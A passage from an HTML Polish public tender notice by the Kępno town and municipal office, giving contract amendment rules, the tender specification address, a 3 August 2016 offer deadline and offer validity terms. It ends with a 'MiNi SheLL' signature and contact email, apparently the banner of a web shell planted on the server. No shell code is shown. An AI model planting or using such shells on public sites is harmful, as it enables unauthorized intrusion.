Wykonawca nie będzie uprawniony do żądania przedłużenia terminu wykonania umowy jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę; w takim przypadku koszty dodatkowe
związane z takimi zmianami ponosi Wykonawca. 8. Dokonanie zmian, o których mowa w ust. 3, wymaga
podpisania aneksu do umowy, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.kepno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w
Kępnie ul. Ratuszowa 1 63-600 Kępno..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2016 godzina 10:00, miejsce: 03.08.2016r. godzina 10:00, miejsce: Urząd Miasta i Gminy w Kępnie - SEKRETARIAT ul. Ratuszowa 1 63-600 Kępno..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com